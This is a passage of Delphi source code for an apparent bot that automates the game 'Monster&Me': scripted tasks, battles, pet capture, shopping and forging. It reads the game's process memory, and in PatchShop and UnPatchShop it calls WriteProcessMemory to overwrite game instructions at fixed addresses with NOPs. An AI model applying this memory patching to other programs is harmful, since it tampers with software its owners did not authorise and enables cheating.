没有找到捉宠目标时是否要逃跑 MonsterNameToCapture: String; // 要捉的宠的名字 CaptureLevelFrom: integer; // 捉宠时级别下限 CaptureLevelTo: integer; // 捉宠时级别上限 HasBegin: Boolean; CreatureCount: integer; Creatures: TList; procedure GetCreatures; constructor Create; destructor Destroy; override; procedure DoBattle; private DeadMonsterCount: integer; CurrHumanAction: integer; // 此次回合中的指令 CurrPetAction: integer; OldCreatureCount: integer; // 捉宠时有用,判断宠是否被捉 LiveMonsterCount: integer; TotalExp: integer; // Total experience for all monsters in battle BattleBufferOrder: DWORD; // 战斗指令 BattleBufferHumanAct: DWORD; // 人物动作 BattleBufferHumanActObj: DWORD; // 人物动作对象 BattleBufferRemain1: DWORD; BattleBufferRemain1a: DWORD; BattleBufferPetAct: DWORD; // 宠物动作 BattleBufferPetActObj: DWORD; // 宠物动作对象 BattleBufferRemain2: DWORD; BattleBufferRemain2a: DWORD; BattleBufferTimer: DWORD; function FindMonsterToAct(IsPetAction:Boolean=False):DWORD; function GetMyPetBattleID(myPet: TPet):DWORD; function GetCreatureById(creatureId: DWORD): CreatureInfo; procedure ReadOrders; procedure WriteOrders; function ReadDeadMonsterCount: integer; procedure SubmitAction; function ReadState: integer; function GetBattleExpForLevel(Level:Integer): integer; end; // 移动 TMove = class private function GetPathNodeCount: integer; Public property PathNodeCount: integer read GetPathNodeCount; constructor Create; destructor Destroy; override; function Init(FromPos, ToPos: integer): Boolean; function GetCurrPathNode: TNodeInfo; function GetCurrPathNodeIndex: integer; procedure GotoNextPathNode; private FromMapIndexInList: integer; // 发起移动/回来动作时当前的地图 ToMapIndexInList: integer; Path: TList; PathNodeIndex: integer; Dijksatra_Nodes: TList; function FindPath: Boolean; end; // 锻造 TForge = class Public StoveCount: integer; constructor Create; destructor Destroy; override; procedure Clean; procedure Init; procedure WriteStoveInstruction; procedure PatchUniverseStove; procedure UnPatchUniverseStove; function GetCurrStove: StoveInfo; function FillStove: Boolean; function HasCurrStoveFinished: Boolean; function IsFinish: Boolean; procedure GotoNextStove; procedure InitStoveStuffsToBeChozen; Private StoveStuffsToBeChozenCount: integer; StoveStuffsToBeChozen: array [0..14] of TStoveStuffToBeChozen; StoveIndex: integer; StoveList: TList; end; // 用户 TUser = class Public ID: WORD; Rank: WORD; Level: WORD; Xiu_Level: DWORD; Xianmo: WORD; // 仙魔 CurrLife: WORD; MaxLife: WORD; CurrNeili: WORD; MaxNeili: WORD; Tili: WORD; // 体力 Neigong: WORD; // 内功 Gongji: WORD; // 攻击 Fangyu: WORD; // 防御 Qinggong: WORD; // 轻功 RemainingPoints: WORD; OldRemaining: integer; Money: DWORD; // 钱 PetCount: integer; BattlePetPos: integer; Pets: array [0..4] of TPet; WGCount: integer; WGCountLimit: integer; WGs: array[0..9] of TWG; OldItemCount: integer; // 使用物品前一次的ItemCount ItemCount: integer; OldItemID: DWORD; Items: array [0..14] of TItem; procedure GetAttr; function FindPetCount(Name: String; Loyal: WORD): integer; procedure GetWGs; procedure GetPets; procedure GetItems; function GetMarchingPet(): TPet; function FindPetPos(Name: String; Loyal: integer): integer; // 从 1 开始,0说明没有找到 function FindItemCount(Name: String; Maker: String): integer; function FindItemPos(Name: String; Maker: String): integer; // 从 1 开始,0说明没有找到 function FindItemPosByID(ID: DWORD): integer; // 从 1 开始,0说明没有找到 function FindNeiyaoPos: integer; // 从 1 开始,0说明没有找到 function UseItem(ID: DWORD):Boolean; function DropItem(ID: DWORD):Boolean; function FindItemID(Name: String; Maker: String): DWORD; function FindItemByType(ItemType: DWORD): DWORD; procedure PatchItemWindow; procedure UnPatchItemWindow; procedure AddStats(statType: String; points: integer); Private end; // 创招 TCreateWG = Class Public WorkStep: Integer; HumanOldNeili: integer; // 用来判断吃否吃过药,不能用满内判断,因为有时候吃药内也不满 HumanOldLevel: integer; // 用了判断是否已经降级 CreateStep: integer; // 创招步骤 IsWorking: Boolean; IsDoingFate: Boolean; // 是否正在过劫 LevelLimit: integer; // 到多少级就停止创招 OldWGCount: integer; DeleteWGRemainIndicator: Real; DeleteFrom: integer; function FindWindows(var hwndMC, hwndXS, hwndNL, hwndQS, hwndGJ, hwndBZ, hwndButtonCZ: HWND): HWND; function DoCreateWG: Boolean; function DoDeleteWGs: Boolean; procedure PatchCreateWG; procedure UnPatchCreateWG; end; var ThisBattle: TBattle = nil; // 战斗 ThisBuyStuff: TBuyStuff = nil; // 原料 ThisCreateWG: TCreateWG = nil; // 创招 ThisForge: TForge = nil; // 锻造 ThisMove: TMove = nil; // 移动 ThisWork: TWork; ThisUser: TUser; implementation Uses UnitGlobal; { constructor TStep.Create(tmpAct: Integer = ActUnknown; tmpX: String = ''; tmpY: String = ''; tmpZ: String = ''); begin Inherited Create; Action := tmpAct; X := tmpX; Y := tmpY; Z := tmpZ; SubStepIndex := 0; end; } //============================================================================== function TTransaction.AddPurpose: PurposeInfo; var tmpPurpose: PurposeInfo; begin new(tmpPurpose); tmpPurpose.Allows := TStringList.Create; tmpPurpose.Allows.Clear; tmpPurpose.isSatisfied := False; Purposes.Add(tmpPurpose); Result := tmpPurpose; end; procedure TTransaction.AddStep(tmpAction: Integer; tmpX, tmpY, tmpZ: String); var tmpStep: TStepInfo; begin tmpStep := TStepInfo.Create(tmpAction, tmpX, tmpY, tmpZ); StepList.Add(tmpStep); StepCount := StepList.Count; end; procedure TTransaction.InsertStep(tmpAction: Integer; tmpX, tmpY, tmpZ: String; pos: Integer); var tmpStep: TStepInfo; begin tmpStep := TStepInfo.Create(tmpAction, tmpX, tmpY, tmpZ); StepList.Insert(pos, tmpStep); StepCount := StepList.Count; end; procedure TTransaction.ClearOldTime; begin FOldTime := 0; end; constructor TTransaction.Create(tmpID: Integer = -1; tmpCaption: String = ''); // 构造过程 begin Inherited Create; FID := tmpID; // 步骤编号 FCaption := tmpCaption; // 步骤说明 StepCount := -1; // 表示还没有开始读详细数据 Purposes := TList.Create; // 目的 StepList := TList.Create; // 步骤 Purposes.Clear; StepList.Clear; Init; // 初始化 end; destructor TTransaction.Destroy; // 销毁过程 var i: Integer; tmpPurpose: PurposeInfo; tmpStep: TStepInfo; begin // 销毁步骤 for i:= 0 to StepList.Count - 1 do begin tmpStep := StepList.Items[i]; tmpStep.Free; end; StepList.Clear; StepList.Free; // 销毁目的 for i := 0 to Purposes.Count - 1 do begin tmpPurpose := Purposes.Items[i]; tmpPurpose.Allows.Clear; tmpPurpose.Allows.Free; end; Purposes.Clear; Purposes.Free; inherited; end; function TTransaction.GetCurrStep: TStepInfo; // 返回当前步骤 begin if StepIndex >= StepCount then StepIndex := StepCount - 1; Result := StepList[StepIndex]; end; procedure TTransaction.GotoNextStep; // 指向下一个步骤 begin StepIndex := StepIndex + 1; end; function TTransaction.HasPassedInterval(MilliSecond: LongWord): Boolean; // 与上次记录时间,是否超过指定毫秒数 begin Result := Windows.GetTickCount - FOldTime >= MilliSecond; end; procedure TTransaction.Init; // 初始化 var i: integer; tmpStep: TStepInfo; begin IsWorking := False; StepIndex := 0; State := 0; OldNPCDialog := ''; FOldTime := 0; for i := 0 to StepCount - 1 do begin tmpStep := StepList[i]; tmpStep.SubStepIndex := 0; end; end; function TTransaction.IsFinish: Boolean; // 检查是否完成 begin Result := (StepIndex >= StepCount); end; function TTransaction.IsPurposeSatisfied: Boolean; // 测试目的是否满足 var i, j, tmpint: integer; tmpString, tmpCase, tmpX, tmpY, tmpZ: String; tmpPurpose: PurposeInfo; tmpDWORD1, tmpDWORD2: DWORD; marchingPet: TPet; begin Result := False; // 没有 Purpose,就返回 False(没有目的,必须执行) if Purposes.Count = 0 then Exit; // 找到每个Purpose的IsSatisfied marchingPet := ThisUser.GetMarchingPet(); for i := 0 to Purposes.Count - 1 do begin tmpPurpose := Purposes[i]; tmpPurpose.isSatisfied := False; // 初始化目的 for j := 0 to tmpPurpose.Allows.Count - 1 do // 各个Allows之间是OR的关系 begin tmpCase := ''; tmpX := ''; tmpY := ''; tmpZ := ''; tmpString := tmpPurpose.Allows[j]; tmpint := Pos(',', tmpString); if tmpint = 0 then tmpCase := tmpString else begin tmpCase := copy(tmpString, 1, tmpint - 1); tmpString := copy(tmpString, tmpint + 1, Length(tmpString) - tmpint); tmpint := Pos(',', tmpString); if tmpint = 0 then tmpX := tmpString else begin tmpX := Copy(tmpString, 1, tmpint - 1); tmpString := Copy(tmpString, tmpint + 1, Length(tmpString) - tmpint); tmpint := Pos(',', tmpString); if tmpint = 0 then tmpY := tmpString else begin tmpY := Copy(tmpString, 1, tmpint - 1); tmpZ := Copy(tmpString, tmpint + 1, Length(tmpString) - tmpint); end; end; end; if tmpX = '[username]' then tmpX := HLInfoList.GlobalHL.UserName; if tmpY = '[username]' then tmpY := HLInfoList.GlobalHL.UserName; if tmpZ = '[username]' then tmpZ := HLInfoList.GlobalHL.UserName; if tmpCase = 'Item' then begin tmpint := ThisUser.FindItemCount(tmpX, tmpY); if tmpint >= strtointdef(tmpZ, 0) then begin tmpPurpose.isSatisfied := True; break; end; end else if tmpCase = 'Pet' then begin if tmpX = 'Marching' then begin if tmpY = 'Level' then begin if marchingPet.Level >= StrToInt(tmpZ) then begin tmpPurpose.isSatisfied := True; Break; end; end; if(tmpY = 'Attack') or (tmpY = 'Atk') then begin if marchingPet.Attack >= StrToInt(tmpZ) then begin tmpPurpose.isSatisfied := True; Break; end; end; if (tmpY = 'Defence') or (tmpY = 'Defense') or (tmpY = 'Def') then begin if marchingPet.Defence >= StrToInt(tmpZ) then begin tmpPurpose.isSatisfied := True; Break; end; end; if (tmpY = 'Dexterity') or (tmpY = 'Dex') then begin if marchingPet.Dexterity >= StrToInt(tmpZ) then begin tmpPurpose.isSatisfied := True; Break; end; end; end else tmpint := ThisUser.FindPetCount(tmpX, StrToIntDef(tmpY, 1000)); if tmpint >= strtointdef(tmpZ, 0) then begin tmpPurpose.isSatisfied := True; Break; end; begin end; end else if tmpCase = 'State' then begin tmpint:=GetUserEnvState; if ((tmpX='Normal') and (tmpint=UserEnvNormal)) or ((tmpX='Dialogue') and (tmpint=UserEnvDialog)) or ((tmpX='Battle') and (tmpint=UserEnvBattle)) then begin tmpPurpose.isSatisfied:=True; break; end; end else if tmpCase = 'Map' then begin if LongWord(StrToIntDef(tmpX, 0)) = ReadCurrMapID then begin GetCurrPosXY(tmpDWORD1, tmpDWORD2); if ((tmpY = '') and (tmpZ = '')) or ((LongWord(StrToIntDef(tmpY, 0)) = tmpDWORD1) and (LongWord(StrToIntDef(tmpZ, 0)) = tmpDWORD2)) then begin tmpPurpose.isSatisfied:=True; break; end; end; end else if tmpCase='Player' then begin if tmpX='Rank' then begin tmpint:=-1; //Player, rank, mortal, basic god, etc if tmpY='Mortal' then tmpint:=0 else if tmpY='Basic God' then tmpint:=1 else if (tmpY='Junior God') or (tmpY='Junior Devil') then tmpint:=2 else if (tmpY='Senior God') or (tmpY='Senior Devil') then tmpint:=3 else if (tmpY='Super God') or (tmpY='Super Devil') then tmpint:=4 else if (tmpY='Master God') or (tmpY='Master Devil') then tmpint:=5 else if (tmpY<>'') then continue; // 如果还不是空,就是写错了,不管 if tmpint>=2 then begin if (tmpY='Junior') or (tmpY='Senior') or (tmpY='Super') or (tmpY='Master') then tmpDWORD1:=UserAttrXian else tmpDWORD1:=UserAttrMo; end else tmpDWORD1:=0; ThisUser.GetAttr; if (((ThisUser.Rank=tmpint) and (ThisUser.Xianmo=tmpDWORD1)) or (tmpint=-1)) // tmpint=-1时,不对Rank进行判断 then begin // Check Level: tmpDWORD1 stands for LevelFrom; tmpDWORD2 stands for LevelTo tmpint:=pos('-', tmpZ); if tmpint=0 then begin tmpDWORD1:=StrToIntDef(tmpZ, 0); tmpDWORD2:=StrToIntDef(tmpZ, 0); end else begin tmpDWORD1:=StrToIntDef(copy(tmpZ, 1, tmpint-1), 0); tmpDWORD2:=StrToIntDef(copy(tmpZ, tmpint+1, length(tmpZ)-tmpint), 0); end; if (ThisUser.Level>=tmpDWORD1) and (ThisUser.Level<=tmpDWORD2) then begin tmpPurpose.isSatisfied:=True; break; end; end; end else if tmpX='Kungfu' then begin ThisUser.GetWGs; if tmpY='MaxCount' then begin if ThisUser.WGCount >= ThisUser.WGCountLimit then begin tmpPurpose.isSatisfied:=True; break; end; end else if ThisUser.WGCount>=StrToIntDef(tmpY, 100) then begin tmpPurpose.isSatisfied:=True; break; end; end else if tmpX='Life' then begin ThisUser.GetAttr; tmpDWORD1:=StrToIntDef(tmpY, 101); tmpDWORD2:=StrToIntDef(tmpZ, 0); tmpint:=(ThisUser.CurrLife * 100) div ThisUser.MaxLife; if (tmpint >= tmpDWORD1) and (tmpint <= tmpDWORD2) then begin tmpPurpose.isSatisfied:=True; break; end; end end end; end; Result:=True; for i:=0 to Purposes.Count-1 do // 各个Purpose之间是AND的关系 begin tmpPurpose:=Purposes[i]; Result:=Result and tmpPurpose.isSatisfied; end; end; procedure TTransaction.PurseSteps(tmpStringList: TStringList); var i, tmpPos{, tmpint}: integer; tmpStep: TStepInfo; tmpString, tmpActionStr: String; begin for i := 0 to StepList.Count - 1 do begin tmpStep := StepList.Items[i]; tmpStep.Free; end; StepList.Clear; StepCount := StrToIntDef(tmpStringList.Values['StepCount'], 0); for i:=0 to StepCount-1 do begin tmpStep:=TStepInfo.Create; tmpString:=tmpStringList.Values[format('Step%d', [i])]; tmppos:=Pos(',', tmpString); if tmppos=0 then tmpActionStr:=tmpString else tmpActionStr:=copy(tmpString, 1, tmppos-1); if tmpActionStr='LeftClick' then tmpStep.Action:=ActLeftClick else if tmpActionStr='RightClick' then tmpStep.Action:=ActRightClick else if tmpActionStr='MoveToPos' then tmpStep.Action:=ActMoveToPos else if tmpActionStr='GoToPos' then tmpStep.Action:=ActMoveToPos else if tmpActionStr='GoToMap' then tmpStep.Action:=ActGoToMap else if tmpActionStr='GotoMap' then tmpStep.Action:=ActGoToMap else if tmpActionStr='BattleAct' then tmpStep.Action:=ActInBattle else if tmpActionStr='Terminate' then tmpStep.Action:=ActTerminate else if tmpActionStr='BuyItem' then tmpStep.Action:=ActBuyStuff else if tmpActionStr='Wux' then tmpStep.Action:=ActDoForge else if tmpActionStr='CloseShop' then tmpStep.Action:=ActQuitShop else if tmpActionStr='PressButton' then tmpStep.Action:=ActPressButton else if tmpActionStr='CallNPC' then tmpStep.Action:=ActCallNPC else if tmpActionStr='HaveItem' then tmpStep.Action:=ActHaveStuff else if tmpActionStr='ItemNum' then tmpStep.Action:=ActStuffNum else if tmpActionStr='HavePet' then tmpStep.Action:=ActHavePet else if tmpActionStr='PetNum' then tmpStep.Action:=ActPetNum else if tmpActionStr='CancelDialog' then tmpStep.Action:=ActCancelNPCDialog else if tmpActionStr='LeftClickWin' then tmpStep.Action:=ActWinLeftClick else if tmpActionStr='DblLeftClickWin' then tmpStep.Action:=ActWinLeftDblClick else if tmpActionStr='JumpToTransaction' then tmpStep.Action:=ActJumpToTransN else if tmpActionStr='Delay' then tmpStep.Action:=ActDelay else if tmpActionStr='BattleActive' then tmpStep.Action:=ActActiveBattle else if tmpActionStr='StartBattle' then tmpStep.Action:=ActActiveBattle else if tmpActionStr='CaptureTarget' then tmpStep.Action:=ActSetCapture else if tmpActionStr='SetHeal' then tmpStep.Action:=ActSetHeal else if tmpActionStr='LocateWindow' then tmpStep.Action:=ActLocateWindow else if tmpActionStr='RightClickWin' then tmpStep.Action:=ActWinRightClick else if tmpActionStr='WaitWindow' then tmpStep.Action:=ActWaitWindow else if tmpActionStr='OpenInv' then tmpStep.Action:=ActOpenItemWindow else if tmpActionStr='UseItem' then tmpStep.Action:=ActUseItem else if tmpActionStr='DropItem' then tmpStep.Action:=ActDropItem else if tmpActionStr='CloseInv' then tmpStep.Action:=ActCloseItemWindow else if tmpActionStr='SetKungfuAttr' then tmpStep.Action:=ActSetWGAttr else if tmpActionStr='SetKungfuEffect' then tmpStep.Action:=ActSetWGDisp else if tmpActionStr='CreateKungfu' then tmpStep.Action:=ActCreateWG else if tmpActionStr='DeleteKungfu' then tmpStep.Action:=ActDeleteWGs else if tmpActionStr='AddStats' then tmpStep.Action:=ActSetAttr else begin tmpStep.Action:=ActUnknown; tmpStep.X:=tmpString; // For future prompts StepList.Add(tmpStep); continue; end; if tmppos<>0 then // Can also resolve x begin tmpString:=copy(tmpString, tmppos+1, length(tmpString)-tmppos); tmppos:=Pos(',', tmpString); if tmppos=0 then begin tmpStep.X:=tmpString; end else // 还能解析出Y begin tmpStep.X:=copy(tmpString, 1, tmppos-1); tmpString:=copy(tmpString, tmppos+1, length(tmpString)-tmppos); tmppos:=Pos(',', tmpString); if tmppos=0 then begin tmpStep.Y:=tmpString; end else // 还能解析出Z begin tmpStep.Y:=copy(tmpString, 1, tmppos-1); tmpStep.Z:=copy(tmpString, tmppos+1, length(tmpString)-tmppos); end; end; end; if tmpStep.X='[username]' then tmpStep.X := HLInfoList.GlobalHL.UserName; if tmpStep.Y='[username]' then tmpStep.Y := HLInfoList.GlobalHL.UserName; if tmpStep.Z='[username]' then tmpStep.Z := HLInfoList.GlobalHL.UserName; StepList.Add(tmpStep); end; end; procedure TTransaction.SetOldTime; begin FOldTime := Windows.GetTickCount; end; procedure TTransaction.TryReadDetails(const vIniFileName: WideString); var ScriptIni: TIniFile; i, j, tmpint, tmpint2: integer; tmpString: String; tmpStringList: TStringList; tmpPurpose: PurposeInfo; begin if StepCount <> -1 then Exit; // 已经Read过了 StepList.Clear; Purposes.Clear; ScriptIni := TIniFile.Create(vIniFileName); tmpStringList := TStringList.Create; tmpStringList.Clear; ScriptIni.ReadSectionValues(format('Transaction%d', [FID]), tmpStringList); tmpint := StrToIntDef(tmpStringList.Values['PurposeCount'], 0); for i := 0 to tmpint - 1 do begin new(tmpPurpose); tmpPurpose.Allows := TStringList.Create; tmpint2:=StrToIntDef(tmpStringList.Values[format('Purpose%d_AllowCount', [i])], 0); for j := 0 to tmpint2 - 1 do begin tmpString := tmpStringList.Values[format('Purpose%d_Allow%d', [i, j])]; tmpPurpose.Allows.Add(tmpString); end; tmpPurpose.isSatisfied := False; Purposes.Add(tmpPurpose); end; PurseSteps(tmpStringList); tmpStringList.Clear; tmpStringList.Free; ScriptIni.Free; end; //============================================================================== function TWork.AddTransaction(const Caption: String = ''): TTransaction; // 增加一个空的事务 begin Result := TTransaction.Create(-1, Caption); // 返回事物指针 self.Add(Result); // 加入列表 end; procedure TWork.DeleteTransaction(Index: integer); begin self.Delete(Index); end; procedure TWork.Clean; // 清除工作脚本 begin self.Clear; FTransactionIndex := 0; FRepeatCount := 1; IsFirstTime := True; end; constructor TWork.Create; // 构造过程,初始化 begin inherited; FTransactionIndex := 0; FRepeatCount := 1; RepeatCounter := 0; end; destructor TWork.Destroy; // 销毁自身 begin Clean; inherited; end; function TWork.GetSize: Integer; begin Result := self.Count; end; function TWork.GetCurrTransaction: TTransaction; // 返回当前事务 begin // 防止事务编号超界 if self.IsFinish then FTransactionIndex := self.Count - 1; // 返回当前事务 Result := self.Items[FTransactionIndex]; end; function TWork.GetItem(Index: Integer): TTransaction; begin Result := TTransaction(inherited Items[Index]); end; procedure TWork.SetItem(Index: Integer; const Value: TTransaction); begin inherited Items[Index] := Value; end; function TWork.GetNextTransToDo: Boolean; // 指向下一个需要执行的事务 var tmpTransaction: TTransaction; begin Result := False; if self.IsFinish then Exit; tmpTransaction := self.Items[FTransactionIndex]; tmpTransaction.TryReadDetails(self.FIniFileName); while tmpTransaction.IsPurposeSatisfied do // 如果发现当前Purpose已经满足了 begin tmpTransaction.Init; tmpTransaction.State := 1; self.GotoNextTrans; if self.IsFinish then Exit; tmpTransaction := self.Items[FTransactionIndex]; tmpTransaction.TryReadDetails(self.FIniFileName); end; Result := True; end; function TWork.GetTransactionByIndex(Index: integer): TTransaction; // 返回指定编号事务 begin Result := self.Items[Index]; end; procedure TWork.GotoNextTrans; // 进入下一个事务 begin Inc(FTransactionIndex); end; procedure TWork.GotoTrans(ToIndex: Integer; IsClearState: Boolean = False); // 指向 ToIndex 指定编号的事务,并根据 IsClearState 设置状态标志 var i: Integer; begin CanWork := True; if ToIndex < 0 then ToIndex := 0; If self.IsFinish then FTransactionIndex := self.Count - 1; for i := ToIndex to FTransactionIndex do if IsClearState then self.Items[i].State := 0; FTransactionIndex := ToIndex; IsFirstTime := True; end; function TWork.IsFinish: Boolean; // 检测工作是否完成 begin // 如果事务编号超出,表示工作完成 Result := (FTransactionIndex >= self.Count); end; function TWork.ReadIni: Boolean; var ScriptIni: TIniFile; i, iTransactionCount: integer; tmpTransaction: TTransaction; tmpString: String; tmpStringList: TStringList; begin Clean; // 清除脚本信息 Result := False; ScriptIni := TIniFile.Create('.\' + FIniFileName); // 打开脚本文件 try tmpStringList := TStringList.Create; // 创建字符串列表 try ScriptIni.ReadSectionValues('Main', tmpStringList); iTransactionCount := StrToIntDef(tmpStringList.Values['TransactionCount'], 0); // 获得步骤数 if iTransactionCount = 0 then Exit; // 步骤数为0,退出 tmpString := tmpStringList.Values['RepeatCount']; // 获得循环数 if tmpString = 'Infinite' then FRepeatCount := -1 else FRepeatCount := StrToIntDef(tmpString, 1); for i := 0 to iTransactionCount - 1 do // 装载脚本 begin tmpTransaction := TTransaction.Create(i, ScriptIni.ReadString(Format('Transaction%d', [i]), 'Caption', '')); if tmpTransaction = nil then begin self.Clean; Exit; end; self.Add(tmpTransaction); end; finally tmpStringList.Free; // 释放字符串列表 end; finally ScriptIni.Free; // 释放脚本文件句柄 end; Result := True; end; //============================================================================== function TBuyStuff.InitShop: Boolean; // 初始化商店 var tmpwinShop: TWindowInfo; tmphwnd: HWND; begin Result := False; tmpwinShop := HLInfoList.GlobalHL.ItemOfWindowTitle('Monster&Me - Store'); if tmpwinShop = nil then Exit; hwndShop := tmpwinShop.Window; if IsWindowEnabled(hwndShop) then EnableWindow(hwndShop, False); if IsWindowVisible(hwndShop) then ShowWindow(hwndShop, SW_HIDE); tmphwnd := HLInfoList.GlobalHL.LocateChildWindowWNDByTitle(hwndShop, 'Item List', True); if tmphwnd = 0 then Exit; hwndItemList := HLInfoList.GlobalHL.LocateChildWindowWNDByTitle(tmphwnd, '', True); if hwndItemList = 0 then Exit; hwndBuy := HLInfoList.GlobalHL.LocateChildWindowWNDByTitle(hwndShop, 'Buy(&B)', True); if hwndBuy = 0 then Exit; Result := True; end; function TBuyStuff.IsSatisfied: Boolean; var tmpCount: integer; begin Result:=False; tmpCount:=ThisUser.FindItemCount(StuffName, StuffMaker); if (ThisUser.ItemCount>=15) or (tmpCount>=StuffCount) then Result:=True; end; procedure TBuyStuff.WriteStuffInfo(Name, Maker: String; Count: integer); begin StuffName:=Name; StuffMaker:=Maker; StuffCount:=Count; end; procedure TBuyStuff.GetAllStuffCount; begin ThisUser.GetItems; OldAllStuffCount:=ThisUser.ItemCount; end; procedure TBuyStuff.PatchShop; var ProcessHandle: THandle; lpNumberOfBytes: SIZE_T; BufferDWord: DWORD; BufferByte: Byte; tmpWin: TWindowInfo; begin BufferDWord := $000001b8; BufferByte := $00; ProcessHandle := OpenProcess(PROCESS_ALL_ACCESS, False, HLInfoList.GlobalHL.ProcessId); if ProcessHandle <> 0 then begin // WriteProcessMemory(ProcessHandle, Pointer($42d99f), @BufferDWord, 4, lpNumberOfBytes); // WriteProcessMemory(ProcessHandle, Pointer($42d9a3), @BufferByte, 1, lpNumberOfBytes); WriteProcessMemory(ProcessHandle, Pointer($42CCDE), @BufferDWord, 4, lpNumberOfBytes); WriteProcessMemory(ProcessHandle, Pointer($42CCE2), @BufferByte, 1, lpNumberOfBytes); BufferDWord := $90909090; BufferByte := $90; // WriteProcessMemory(ProcessHandle, Pointer($42d8aa), @BufferDWord, 4, lpNumberOfBytes); // WriteProcessMemory(ProcessHandle, Pointer($42d8ae), @BufferByte, 1, lpNumberOfBytes); WriteProcessMemory(ProcessHandle, Pointer($42CBEA), @BufferDWord, 4, lpNumberOfBytes); WriteProcessMemory(ProcessHandle, Pointer($42CBEE), @BufferByte, 1, lpNumberOfBytes); end; CloseHandle(ProcessHandle); tmpWin := HLInfoList.GlobalHL.ItemOfWindowTitle('Monster&Me - Store'); if tmpWin <> nil then if IsWindow(tmpWin.Window) and IsWindowVisible(tmpWin.Window) then ShowWindow(tmpWin.Window, SW_HIDE); end; procedure TBuyStuff.UnPatchShop; var ProcessHandle: THandle; lpNumberOfBytes: SIZE_T; BufferDWord: DWORD; BufferByte: Byte; tmpWin: TWindowInfo; begin //BufferDWord := $fe0ebce8; BufferDWord := $fdfa05e8; BufferByte := $ff; ProcessHandle := OpenProcess(PROCESS_ALL_ACCESS, False, HLInfoList.GlobalHL.ProcessId); if ProcessHandle <> 0 then begin // WriteProcessMemory(ProcessHandle, Pointer($42d99f), @BufferDWord, 4, lpNumberOfBytes); // WriteProcessMemory(ProcessHandle, Pointer($42d9a3), @BufferByte, 1, lpNumberOfBytes); WriteProcessMemory(ProcessHandle, Pointer($42CCDE), @BufferDWord, 4, lpNumberOfBytes); WriteProcessMemory(ProcessHandle, Pointer($42CCE2), @BufferByte, 1, lpNumberOfBytes); //BufferDWord := $fe0c09e8; BufferDWord := $fdf751e8; BufferByte := $ff; // WriteProcessMemory(ProcessHandle, Pointer($42d8aa), @BufferDWord, 4, lpNumberOfBytes); // WriteProcessMemory(ProcessHandle, Pointer($42d8ae), @BufferByte, 1, lpNumberOfBytes); WriteProcessMemory(ProcessHandle, Pointer($42CBEA), @BufferDWord, 4, lpNumberOfBytes); WriteProcessMemory(ProcessHandle, Pointer($42CBEE), @BufferByte, 1, lpNumberOfBytes); end; CloseHandle(ProcessHandle); tmpWin := HLInfoList.GlobalHL.ItemOfWindowTitle('Monster&Me - Store'); if tmpWin <> nil then if IsWindow(tmpWin.Window) and (not IsWindowVisible(tmpWin.Window)) then Sendmessage(tmpWin.Window, WM_CLOSE, 0, 0); end; function TBuyStuff.DoBuyStuff: Boolean; var tmpIndex: integer; tmpRect: TRECT; begin Result := False; tmpIndex:=SendMessage(hwndItemList, LB_FINDSTRING, -1, LPARAM(PChar(StuffName))); if tmpindex=LB_ERR then Exit; if SendMessage(hwndItemList, LB_SETCURSEL, tmpindex, 0)=LB_ERR then Exit; if SendMessage(hwndItemList, LB_GETITEMRECT, tmpindex, LPARAM(@tmpRect))=LB_ERR then Exit; LeftClickOnSomeWindow_Send(hwndItemList, tmpRect.Left, tmpRect.Top); sleep(200); if tmpindex=SendMessage(hwndItemList, LB_GETCURSEL, 0, 0) then begin LeftClickOnSomeWindow_Post(hwndBuy, 0, 0); Result := True; end; end; function TBuyStuff.HasBoughtStuff: Boolean; begin Result := False; ThisUser.GetItems; if ThisUser.ItemCount>OldAllStuffCount then Result:=True end; constructor TBattle.Create; begin Inherited Create; OrderHumanAction:=BattleIdle; OrderPetAction:=BattleIdle; EscapeWhenNoMonsterToCapture:=True; MonsterNameToCapture:=''; CaptureLevelFrom:=0; CaptureLevelTo:=5000; HasBegin:=False; DeadMonsterCount:=0; CurrHumanAction:=BattleIdle; CurrPetAction:=BattleIdle; CreatureCount:=0; OldCreatureCount:=0; LiveMonsterCount:=0; TotalExp:=0; BattleBufferOrder:=0; BattleBufferHumanAct:=BattleIdle; BattleBufferHumanActObj:=0; BattleBufferRemain1:=0; BattleBufferPetAct:=BattleIdle; BattleBufferPetActObj:=0; BattleBufferRemain2:=0; Creatures:=TList.Create; Creatures.Clear; end; destructor TBattle.Destroy; var i: integer; tmpCreature: CreatureInfo; begin for i:=0 to Creatures.Count-1 do begin tmpCreature := Creatures.Items[i]; dispose(tmpCreature); end; Creatures.Clear; Creatures.Free; Inherited Destroy; end; procedure TBattle.GetCreatures; var i, j:integer; pCurrCreature: DWORD; // CreatureBuffer: array [0.. CreatureInfoSize-1] of Byte; tmp: DWORD; tmpCreature: CreatureInfo; CharArrayTemp: array [0..15] of Char; begin LiveMonsterCount:=0; for i:=0 to Creatures.Count - 1 do begin tmpCreature := Creatures.Items[i]; Dispose(tmpCreature); end; Creatures.Clear; ReadFromHLMEM(Pointer(BattleCreatureCountAddress), @tmp, 4); CreatureCount:=tmp; for i := 0 to CreatureCount - 1 do begin new(tmpCreature); pCurrCreature:=GetHLMemListNumberByNo(i, BattleFirstCreatureAddressAddress, $674CCC); ReadFromHLMEM(Pointer(pCurrCreature), @tmpCreature.Data, CreatureInfoSize); tmpCreature.ID:=tmpCreature.Data[$5f]*65536*256 +tmpCreature.Data[$5e]*65536 +tmpCreature.Data[$5d]*256 +tmpCreature.Data[$5c]; for j:=0 to 15 do CharArrayTemp[j]:=Char(tmpCreature.Data[j+$60]); tmpCreature.Name:=CharArrayTemp; tmpCreature.Level := tmpCreature.Data[$0d] * 256 + tmpCreature.Data[$0c]; tmpCreature.State := tmpCreature.Data[$20]; if tmpCreature.State=$65 then tmpCreature.IsDead:=True else tmpCreature.IsDead:=False; Creatures.Add(tmpCreature); if (tmpCreature.ID>=$C0000000) and (not tmpCreature.IsDead) then // 说明是未死的敌怪 LiveMonsterCount:=LiveMonsterCount+1; end; end; function TBattle.GetMyPetBattleID(myPet: TPet): DWORD; var i: integer; tmpCreature: CreatureInfo; myPetId: DWORD; begin myPetId := 0; for i := 0 to CreatureCount - 1 do begin tmpCreature:=Creatures.Items[i]; if tmpCreature.ID<$C0000000 then begin if (myPet.Name = tmpCreature.Name) and (myPet.Level = tmpCreature.Level) then begin myPetId := tmpCreature.ID; break; end; end; end; Result := myPetId; end; function TBattle.GetCreatureById(creatureId: DWORD): CreatureInfo; var i: integer; tmpCreature, creature: CreatureInfo; begin creature := nil; for i := 0 to CreatureCount - 1 do begin tmpCreature:=Creatures.Items[i]; if tmpCreature.ID<$C0000000 then begin if creatureId = tmpCreature.id then begin creature := tmpCreature; break; end; end; end; Result := creature; end; function 